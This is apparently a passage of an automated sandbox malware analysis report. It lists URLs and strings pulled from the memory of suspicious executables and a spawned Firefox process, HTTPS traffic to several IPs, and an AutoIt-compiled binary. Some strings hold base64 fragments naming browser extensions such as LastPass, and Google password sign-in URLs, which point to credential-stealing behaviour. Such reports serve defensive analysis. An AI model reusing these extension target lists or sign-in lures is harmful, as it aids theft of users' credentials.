Source: firefox.exe, 00000017.00000003.2983132390.000002882376F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3117080621.0000028824396000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982268821.0000028823500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982443745.000002882371D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3112181338.0000028823900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2982699498.0000028823738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3173331545.000002882DF05000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982871988.0000028823753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2983357091.000002882378A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BAF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F825000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F87B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3043510169.000002882BAF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3044553062.000002882BA78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.000002882516E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3117080621.0000028824319000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/UpdateService:selectUpdate
Source: firefox.exe, 00000017.00000002.3090755070.000002881F70C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BAD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089180136.000002881EF7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3173331545.000002882DF1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3173331545.000002882DF26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3181547624.0000307B45B04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089180136.000002881EFA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3090755070.000002881F7D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: 7e96f85771.exe, 00000008.00000002.3164480115.000000000086A000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: firefox.exe, 00000017.00000002.3179092949.000002882E21F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 00000017.00000003.3036113479.000002882D119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3039351841.000002882D8E5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825176000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: 7e96f85771.exe, 00000008.00000002.3164480115.000000000086A000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: firefox.exe, 00000017.00000002.3179092949.000002882E21F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: 7e96f85771.exe, 00000008.00000002.3164480115.000000000086A000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 7e96f85771.exe, 00000008.00000003.3117220273.000000002FBBC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3179092949.000002882E21F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3173331545.000002882DF08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 7e96f85771.exe, 00000008.00000002.3164480115.000000000086A000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: 7e96f85771.exe, 00000008.00000002.3164480115.000000000086A000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: firefox.exe, 00000017.00000002.3179092949.000002882E21F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: 7e96f85771.exe, 00000008.00000003.3117220273.000000002FBBC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3179092949.000002882E21F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3173331545.000002882DF08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 7e96f85771.exe, 00000008.00000002.3164480115.000000000086A000.00000040.00000001.01000000.0000000A.sdmp, firefox.exe, 00000017.00000002.3088293494.000002881EE58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: 7e96f85771.exe, 00000008.00000003.3117220273.000000002FBBC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3179092949.000002882E21F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3142479922.000002882B108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089180136.000002881EFDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3179092949.000002882E20B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3180311343.000012316BF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3117080621.0000028824380000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3173331545.000002882DF05000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E047000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3050822463.000002882E0B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3055688840.000002882E047000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3052847397.000002882E04D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3179092949.000002882E20B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3137866600.0000028826C8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3173331545.000002882DFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3173331545.000002882DF05000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F873000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3050822463.000002882E0B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3142479922.000002882B108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000017.00000002.3180688170.000022DAD3C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://yandex.com
Source: firefox.exe, 00000017.00000003.3055110674.0000028825DF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3044675435.0000028825DF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3114071187.0000028823EB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3127499591.0000028825DA1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3149714295.000002882B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3141504979.000002882B033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3141504979.000002882B00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3127499591.0000028825DF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3044553062.000002882BA78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000017.00000003.3054203227.0000028825F26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3137866600.0000028826C8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3171068076.000002882D72A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3056228235.0000028825F26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3137866600.0000028826C9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3141504979.000002882B00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3130743297.0000028825F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 00000017.00000002.3089180136.000002881EFEC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3053217524.000002882601C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3090755070.000002881F703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3085847545.000002881365D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3127499591.0000028825DA1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3117080621.000002882432A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3171068076.000002882D72A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3117080621.0000028824356000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3141504979.000002882B033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3085847545.0000028813603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123804190.000002882528C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3137866600.0000028826C9C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3149714295.000002882B61F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F87B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3100093809.00000288230EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825176000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3171068076.000002882D7F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3053170205.000002882D7F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3088293494.000002881EE43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000015.00000002.2967033003.0000010EA05C1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2977909853.000001B5BD2B9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3085164159.00000288132B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdArgument
Source: firefox.exe, 00000017.00000002.3086539959.0000028814EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdUpdateService:remove
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/accountMIN_STATUS_ANIMATION_DURATIONservices.sync.log.logger.browserensureUnload
Source: firefox.exe, 00000017.00000003.3054203227.0000028825F26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3056228235.0000028825F26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3130743297.0000028825F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/var(--in-content-box-background)var(--in-content-text-color)
Source: unknown Network traffic detected: HTTP traffic on port 61029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61070
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61030
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61074
Source: unknown Network traffic detected: HTTP traffic on port 61025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61028
Source: unknown Network traffic detected: HTTP traffic on port 61044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61029
Source: unknown Network traffic detected: HTTP traffic on port 61067 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61065
Source: unknown Network traffic detected: HTTP traffic on port 61074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61066
Source: unknown Network traffic detected: HTTP traffic on port 61038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61067
Source: unknown Network traffic detected: HTTP traffic on port 61011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61103
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61080
Source: unknown Network traffic detected: HTTP traffic on port 61080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61040
Source: unknown Network traffic detected: HTTP traffic on port 61076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61094 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61075
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61110
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61078
Source: unknown Network traffic detected: HTTP traffic on port 61035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61079
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61037
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61038
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61094
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61095
Source: unknown Network traffic detected: HTTP traffic on port 61079 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61098 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61009
Source: unknown Network traffic detected: HTTP traffic on port 61065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61095 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61044
Source: unknown Network traffic detected: HTTP traffic on port 61036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61088
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61089
Source: unknown Network traffic detected: HTTP traffic on port 61030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61062
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61063
Source: unknown Network traffic detected: HTTP traffic on port 61078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61011
Source: unknown Network traffic detected: HTTP traffic on port 61037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61012
Source: unknown Network traffic detected: HTTP traffic on port 61016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 61012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 61016
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:61009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:61011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:61016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:61035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:61038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:61065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:61072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:61074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:61075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:61076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:61079 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:61094 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:61095 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:61098 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:61103 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 88edf6a100.exe, 0000000A.00000000.2929918715.0000000000532000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_043694dc-e
Source: 88edf6a100.exe, 0000000A.00000000.2929918715.0000000000532000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer 